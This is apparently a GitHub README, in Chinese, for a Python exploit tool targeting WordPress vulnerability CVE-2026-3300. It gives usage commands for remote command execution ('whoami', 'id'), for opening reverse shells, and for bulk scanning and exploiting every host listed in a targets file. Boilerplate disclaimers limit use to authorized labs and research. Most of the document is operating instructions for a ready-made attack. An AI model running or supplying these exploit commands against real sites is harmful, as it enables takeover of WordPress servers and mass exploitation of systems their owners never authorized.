HORKimhab/CVE-2026-3300
GitHub: HORKimhab/CVE-2026-3300
针对 WordPress 漏洞 CVE-2026-3300 的 Python 利用工具,支持漏洞扫描、命令执行和反弹 Shell 等多种渗透测试操作。
Stars: 0 | Forks: 0
# CVE-2026-3300 - Wordpress
## ⚡ 简单用法
仅在安全和已授权的环境中使用此项目,例如:
- 本地虚拟机
- Docker 容器
- 隔离的实验室环境
- 授权的渗透测试环境
示例设置:
```
git clone
cd
# Project 使用 python,请遵循以下步骤
# 创建虚拟环境
python -m venv venv
# 激活虚拟环境
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
```
示例用法:
```
# 正常命令执行
python cve-2026-3300.py http://localhost --mode poc -c "whoami"
# 尝试不同的 payload 类型
python cve-2026-3300.py http://localhost --mode poc -p passthru -c "id"
# Reverse Shell(推荐)
python cve-2026-3300.py http://localhost --mode reverse --listen 4444
# 扫描所有目标
python cve-2026-3300.py --file targets.txt --mode scan
# Exploit 所有目标
python cve-2026-3300.py --file targets.txt --mode exploit -c "whoami"
# Reverse shell(单一目标)
python cve-2026-3300.py --file targets.txt --mode reverse -l 4444
# 使用常见字段名测试
python cve-2026-3300.py http://target.com --mode exploit --field text_1 -c "whoami"
python cve-2026-3300.py http://target.com --mode exploit --field email -c "id"
# Reverse shell
python cve-2026-3300.py http://target.com --mode reverse --field text_field -l 4444
```
# 📚 教育安全研究仓库
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
## ⚠️ 安全与法律免责声明
## 目的
本仓库仅供**教育和授权的安全研究使用**。
它旨在帮助用户了解:
- 安全漏洞
- 沙盒与隔离概念
- 安全编码和防御实践
## 仅限授权使用
仅在您已获得授权的环境中使用本仓库,例如:
- 个人实验室或虚拟机
- Docker 或隔离环境
- 授权的渗透测试
- 网络安全培训或学术研究
严禁未经授权或非法使用。
## 免责声明
作者和贡献者**不负责**因本项目造成的任何损害、滥用、法律问题或损失。
使用本仓库即表示您同意:
- 您对自己的行为负责
- 您将合法且符合道德地使用它
- 本项目按“原样”提供,**不提供任何担保**
## 道德使用
本项目旨在用于:
- 防御性安全研究
- 网络安全教育
- 漏洞意识提升
- 安全系统和软件研究
请遵循负责任的披露原则,并遵守所有适用法律。
## 联系方式
如需进行负责任的披露或合作,请通过 GitHub 联系仓库维护者。
标签:CISA项目, Python, WordPress, 无后门, 逆向工具